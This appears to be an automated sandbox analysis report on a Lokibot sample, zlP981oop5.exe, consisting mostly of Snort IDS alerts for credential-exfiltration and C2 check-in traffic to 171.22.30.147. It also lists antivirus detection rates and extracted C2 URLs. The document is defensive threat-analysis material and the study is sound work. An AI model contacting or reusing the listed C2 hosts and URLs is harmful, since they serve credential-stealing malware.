            Timestamp:192.168.2.3171.22.30.14749877802025381 01/05/23-08:53:03.433942
            SID:2025381
            Source Port:49877
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749862802825766 01/05/23-08:52:59.436708
            SID:2825766
            Source Port:49862
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749934802825766 01/05/23-08:53:20.304475
            SID:2825766
            Source Port:49934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749779802825766 01/05/23-08:52:35.235559
            SID:2825766
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497172025483 01/05/23-08:52:14.761442
            SID:2025483
            Source Port:80
            Destination Port:49717
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749938802024313 01/05/23-08:53:21.374225
            SID:2024313
            Source Port:49938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749938802024318 01/05/23-08:53:21.374225
            SID:2024318
            Source Port:49938
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749957802825766 01/05/23-08:53:26.768134
            SID:2825766
            Source Port:49957
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750002802024318 01/05/23-08:53:40.505314
            SID:2024318
            Source Port:50002
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749756802825766 01/05/23-08:52:27.231494
            SID:2825766
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500572025483 01/05/23-08:53:56.827355
            SID:2025483
            Source Port:80
            Destination Port:50057
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498532025483 01/05/23-08:52:57.043641
            SID:2025483
            Source Port:80
            Destination Port:49853
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499802025483 01/05/23-08:53:34.784528
            SID:2025483
            Source Port:80
            Destination Port:49980
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750021802025381 01/05/23-08:53:46.361205
            SID:2025381
            Source Port:50021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749980802025381 01/05/23-08:53:34.702395
            SID:2025381
            Source Port:49980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750018802825766 01/05/23-08:53:44.999195
            SID:2825766
            Source Port:50018
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750077802021641 01/05/23-08:54:02.067623
            SID:2021641
            Source Port:50077
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749983802025381 01/05/23-08:53:35.478290
            SID:2025381
            Source Port:49983
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498252025483 01/05/23-08:52:47.996157
            SID:2025483
            Source Port:80
            Destination Port:49825
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749749802021641 01/05/23-08:52:25.162571
            SID:2021641
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749832802021641 01/05/23-08:52:49.809310
            SID:2021641
            Source Port:49832
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749820802024318 01/05/23-08:52:46.558490
            SID:2024318
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498032025483 01/05/23-08:52:41.982616
            SID:2025483
            Source Port:80
            Destination Port:49803
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749820802024313 01/05/23-08:52:46.558490
            SID:2024313
            Source Port:49820
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499522025483 01/05/23-08:53:25.281435
            SID:2025483
            Source Port:80
            Destination Port:49952
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749823802024318 01/05/23-08:52:47.379297
            SID:2024318
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749783802024313 01/05/23-08:52:36.372208
            SID:2024313
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749786802024313 01/05/23-08:52:37.217550
            SID:2024313
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749878802021641 01/05/23-08:53:03.704233
            SID:2021641
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497672025483 01/05/23-08:52:30.379314
            SID:2025483
            Source Port:80
            Destination Port:49767
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749961802024318 01/05/23-08:53:29.597138
            SID:2024318
            Source Port:49961
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749964802024313 01/05/23-08:53:30.400374
            SID:2024313
            Source Port:49964
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499302025483 01/05/23-08:53:19.298581
            SID:2025483
            Source Port:80
            Destination Port:49930
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749961802024313 01/05/23-08:53:29.597138
            SID:2024313
            Source Port:49961
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749786802024318 01/05/23-08:52:37.217550
            SID:2024318
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749783802024318 01/05/23-08:52:36.372208
            SID:2024318
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749964802024318 01/05/23-08:53:30.400374
            SID:2024318
            Source Port:49964
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497452025483 01/05/23-08:52:24.104430
            SID:2025483
            Source Port:80
            Destination Port:49745
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749954802825766 01/05/23-08:53:25.726692
            SID:2825766
            Source Port:49954
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497822025483 01/05/23-08:52:36.186611
            SID:2025483
            Source Port:80
            Destination Port:49782
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749776802825766 01/05/23-08:52:33.619524
            SID:2825766
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749736802025381 01/05/23-08:52:21.543284
            SID:2025381
            Source Port:49736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749823802024313 01/05/23-08:52:47.379297
            SID:2024313
            Source Port:49823
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750001802025381 01/05/23-08:53:40.243949
            SID:2025381
            Source Port:50001
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749717802024318 01/05/23-08:52:14.673219
            SID:2024318
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749937802825766 01/05/23-08:53:21.090422
            SID:2825766
            Source Port:49937
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749759802825766 01/05/23-08:52:28.024665
            SID:2825766
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749835802021641 01/05/23-08:52:50.902278
            SID:2021641
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749808802025381 01/05/23-08:52:43.325468
            SID:2025381
            Source Port:49808
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750045802024318 01/05/23-08:53:53.481872
            SID:2024318
            Source Port:50045
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749714802024313 01/05/23-08:52:13.349412
            SID:2024313
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749803802024318 01/05/23-08:52:41.905218
            SID:2024318
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500412025483 01/05/23-08:53:52.491665
            SID:2025483
            Source Port:80
            Destination Port:50041
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498312025483 01/05/23-08:52:49.622210
            SID:2025483
            Source Port:80
            Destination Port:49831
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750048802024313 01/05/23-08:53:54.265201
            SID:2024313
            Source Port:50048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750048802024318 01/05/23-08:53:54.265201
            SID:2024318
            Source Port:50048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499682025483 01/05/23-08:53:31.591227
            SID:2025483
            Source Port:80
            Destination Port:49968
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749963802025381 01/05/23-08:53:30.141323
            SID:2025381
            Source Port:49963
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749852802021641 01/05/23-08:52:56.705137
            SID:2021641
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749763802021641 01/05/23-08:52:29.176849
            SID:2021641
            Source Port:49763
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749941802021641 01/05/23-08:53:22.165125
            SID:2021641
            Source Port:49941
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750008802021641 01/05/23-08:53:42.094852
            SID:2021641
            Source Port:50008
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749785802025381 01/05/23-08:52:36.951784
            SID:2025381
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749874802025381 01/05/23-08:53:02.624496
            SID:2025381
            Source Port:49874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749898802024313 01/05/23-08:53:09.845609
            SID:2024313
            Source Port:49898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749987802024318 01/05/23-08:53:36.549688
            SID:2024318
            Source Port:49987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499242025483 01/05/23-08:53:17.670335
            SID:2025483
            Source Port:80
            Destination Port:49924
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749898802024318 01/05/23-08:53:09.845609
            SID:2024318
            Source Port:49898
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749987802024313 01/05/23-08:53:36.549688
            SID:2024313
            Source Port:49987
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749716802025381 01/05/23-08:52:14.357533
            SID:2025381
            Source Port:49716
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749981802024313 01/05/23-08:53:34.961120
            SID:2024313
            Source Port:49981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749710802025381 01/05/23-08:52:11.662757
            SID:2025381
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749805802025381 01/05/23-08:52:42.467353
            SID:2025381
            Source Port:49805
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749892802024313 01/05/23-08:53:07.470439
            SID:2024313
            Source Port:49892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749739802025381 01/05/23-08:52:22.339123
            SID:2025381
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497392025483 01/05/23-08:52:22.422279
            SID:2025483
            Source Port:80
            Destination Port:49739
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749828802025381 01/05/23-08:52:48.735651
            SID:2025381
            Source Port:49828
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498752025483 01/05/23-08:53:02.993352
            SID:2025483
            Source Port:80
            Destination Port:49875
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500792025483 01/05/23-08:54:02.671781
            SID:2025483
            Source Port:80
            Destination Port:50079
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749981802024318 01/05/23-08:53:34.961120
            SID:2024318
            Source Port:49981
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749892802024318 01/05/23-08:53:07.470439
            SID:2024318
            Source Port:49892
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749915802024313 01/05/23-08:53:15.112176
            SID:2024313
            Source Port:49915
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749917802025381 01/05/23-08:53:15.635846
            SID:2025381
            Source Port:49917
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750025802024318 01/05/23-08:53:48.086655
            SID:2024318
            Source Port:50025
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750061802825766 01/05/23-08:53:57.824423
            SID:2825766
            Source Port:50061
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750067802825766 01/05/23-08:53:59.373237
            SID:2825766
            Source Port:50067
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750054802021641 01/05/23-08:53:55.890469
            SID:2021641
            Source Port:50054
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749737802024313 01/05/23-08:52:21.818381
            SID:2024313
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749826802024313 01/05/23-08:52:48.184567
            SID:2024313
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749714802024318 01/05/23-08:52:13.349412
            SID:2024318
            Source Port:49714
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749803802024313 01/05/23-08:52:41.905218
            SID:2024313
            Source Port:49803
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749986802025381 01/05/23-08:53:36.285692
            SID:2025381
            Source Port:49986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749740802021641 01/05/23-08:52:22.636691
            SID:2021641
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749737802024318 01/05/23-08:52:21.818381
            SID:2024318
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749826802024318 01/05/23-08:52:48.184567
            SID:2024318
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749989802025381 01/05/23-08:53:37.099082
            SID:2025381
            Source Port:49989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750025802024313 01/05/23-08:53:48.086655
            SID:2024313
            Source Port:50025
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750022802024313 01/05/23-08:53:46.665385
            SID:2024313
            Source Port:50022
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749897802025381 01/05/23-08:53:09.055046
            SID:2025381
            Source Port:49897
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749915802024318 01/05/23-08:53:15.112176
            SID:2024318
            Source Port:49915
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749780802024313 01/05/23-08:52:35.511333
            SID:2024313
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498812025483 01/05/23-08:53:04.594550
            SID:2025483
            Source Port:80
            Destination Port:49881
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499182025483 01/05/23-08:53:16.001398
            SID:2025483
            Source Port:80
            Destination Port:49918
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749780802024318 01/05/23-08:52:35.511333
            SID:2024318
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498972025483 01/05/23-08:53:09.137400
            SID:2025483
            Source Port:80
            Destination Port:49897
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749713802025381 01/05/23-08:52:12.826844
            SID:2025381
            Source Port:49713
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499022025483 01/05/23-08:53:11.691862
            SID:2025483
            Source Port:80
            Destination Port:49902
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749984802024313 01/05/23-08:53:35.743967
            SID:2024313
            Source Port:49984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749842802825766 01/05/23-08:52:54.011182
            SID:2825766
            Source Port:49842
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749984802024318 01/05/23-08:53:35.743967
            SID:2024318
            Source Port:49984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749931802825766 01/05/23-08:53:19.484274
            SID:2825766
            Source Port:49931
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749802802025381 01/05/23-08:52:41.641382
            SID:2025381
            Source Port:49802
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749753802825766 01/05/23-08:52:26.326305
            SID:2825766
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750022802024318 01/05/23-08:53:46.665385
            SID:2024318
            Source Port:50022
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749947802021641 01/05/23-08:53:23.814636
            SID:2021641
            Source Port:49947
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500632025483 01/05/23-08:53:58.415827
            SID:2025483
            Source Port:80
            Destination Port:50063
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750024802025381 01/05/23-08:53:47.812882
            SID:2025381
            Source Port:50024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749858802021641 01/05/23-08:52:58.341182
            SID:2021641
            Source Port:49858
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750051802021641 01/05/23-08:53:55.100340
            SID:2021641
            Source Port:50051
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749829802024318 01/05/23-08:52:49.001962
            SID:2024318
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749918802024318 01/05/23-08:53:15.920283
            SID:2024318
            Source Port:49918
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749769802021641 01/05/23-08:52:30.825016
            SID:2021641
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749829802024313 01/05/23-08:52:49.001962
            SID:2024313
            Source Port:49829
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750064802825766 01/05/23-08:53:58.597698
            SID:2825766
            Source Port:50064
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749918802024313 01/05/23-08:53:15.920283
            SID:2024313
            Source Port:49918
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: zlP981oop5.exeVirustotal: Detection: 30%Perma Link
            Source: http://171.22.30.147/kelly/five/fre.phpAvira URL Cloud: Label: malware
            Source: http://171.22.30.147/kelly/five/fre.phpVirustotal: Detection: 14%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeVirustotal: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy)Virustotal: Detection: 29%Perma Link
            Source: 00000003.00000000.255568644.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
            Source: zlP981oop5.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: zlP981oop5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\xampp\htdocs\b61e5acae9c94fab8e78397ab543d5d6\Loader\Release\Loader.pdb source: zlP981oop5.exe, 00000000.00000002.266742028.0000000002850000.00000004.00000800.00020000.00000000.sdmp, zlP981oop5.exe, 00000000.00000002.266467890.000000000040C000.00000004.00000001.01000000.00000003.sdmp, gblqfiy.exe, 00000001.00000000.247488143.000000000040F000.00000002.00000001.01000000.00000004.sdmp, gblqfiy.exe, 00000001.00000002.259531027.000000000040F000.00000002.00000001.01000000.00000004.sdmp, gblqfiy.exe, 00000003.00000000.250738909.000000000040F000.00000002.00000001.01000000.00000004.sdmp, nsk2BAD.tmp.0.dr, gblqfiy.exe.0.dr
            Source: Binary string: wntdll.pdbUGP source: gblqfiy.exe, 00000001.00000003.254805333.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gblqfiy.exe, 00000001.00000003.255029911.000000001A190000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: gblqfiy.exe, 00000001.00000003.254805333.000000001A190000.00000004.00001000.00020000.00000000.sdmp, gblqfiy.exe, 00000001.00000003.255029911.000000001A190000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
            Source: C:\Users\user\Desktop\zlP981oop5.exeCode function: 0_2_0040290B FindFirstFileW,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040756A _free,_free,FindFirstFileExW,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 1_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,
            Source: C:\Users\user\AppData\Local\Temp\gblqfiy.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

            Networking

            barindex
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49699 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49699 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49699 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49699 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49699 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49700 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49700 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49700 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49700 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49700 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49701 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49701 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49701 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49701 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49701 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49701
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49702 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49702 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49702 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49702 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49702 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49702
